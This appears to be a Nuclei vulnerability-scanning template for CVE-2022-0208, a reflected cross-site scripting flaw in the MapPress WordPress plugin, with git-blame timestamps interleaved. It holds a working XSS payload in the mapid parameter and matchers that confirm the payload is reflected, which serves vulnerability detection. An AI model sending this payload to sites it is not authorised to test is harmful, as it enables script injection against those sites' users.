2022-04-24 10:37:48 +00:00
id : CVE-2022-0208
info :
2022-09-09 17:34:37 +00:00
name : WordPress Plugin MapPress < 2.73.4 - Cross-Site Scripting
2022-04-24 10:37:48 +00:00
author : edoardottt
severity : medium
description : The MapPress Maps for WordPress plugin before 2.73.4 does not sanitise and escape the mapid parameter before outputting it back in the "Bad mapid" error message, leading to a Reflected Cross-Site Scripting.
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2022-0208
cwe-id : CWE-79
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2022-0208
- https://wpscan.com/vulnerability/59a2abd0-4aee-47aa-ad3a-865f624fa0fc
2022-08-27 04:41:18 +00:00
tags : cve2022,mappress,xss,wordpress,wp-plugin,wpscan,cve
2022-04-24 10:37:48 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E"
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
part : header
words :
- "text/html"
- type : word
part : body
words :
- "<img src onerror=alert(document.domain)>"
- "Bad mapid"
condition : and